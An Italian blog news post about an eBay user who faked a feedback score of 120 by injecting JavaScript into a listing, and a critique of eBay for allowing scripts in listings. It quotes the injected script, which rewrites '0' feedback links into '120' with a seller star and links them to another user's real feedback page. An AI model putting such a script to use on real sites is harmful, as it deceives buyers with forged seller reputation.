Utente eBay aumenta feedback istantaneamente

Un utente eBay è riuscito ad aumentare il proprio feedback da 0 a 120 inserendo semplicemente del codice Javascript all’interno di un’inserzione. La stessa azienda d’aste ha confermato l’accaduto.

Il codice permette anche di essere trasportato nella pagina “Profilo di feedback” di un altro utente che gode di fama “rispettarbile” rendendo ancora di più verosimile la “truffa virtuale”.

Il poter inserire il codice Javascript all’interno di un’inserzione comporta notevoli rischi di sicurezza per tutto il sistema, permettendo interventi maliziosi da parte di utenti scorretti. Nonostante si utilizzino metodi per rendere le transazioni sicuri, eBay ha peccato d’ingenuità lasciando troppa libertà agli utenti.

Ecco una porzione del codice inserito:

/ First, get all links on page
var nodes = document.body.getElementsByTagName(‘A’);

// For each link on the page,
for( var i =
0; i < nodes.length; i++ ) {

// If the text of that link is “0” (zero),
if (nodes[i].innerHTML == ‘0’) {

// Then change it from “0” to “120” and include the nice
// blue eBay star reserved for sellers with feedbacks of 100-499

nodes[i].innerHTML = ‘120’ +
‘<img align=”absmiddle” border=”0″ height=”25″ width=”25″
alt=”Feedback score is 100 to 499″
src=http://pics.ebaystatic.com/aw/pics/uk/icon/iconTealStar_25x25.gif>’;

// And link it to another seller who actually has that many positive feedbacks
nodes[i].href = ‘http://feedback.ebay.com/ws/eBayISAPI.dll%5BREMOVED%5D&#8217;;

};
};

Ulteriori infomazioni su Anti-Phishing Italia.

Annunci

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger hanno fatto clic su Mi Piace per questo: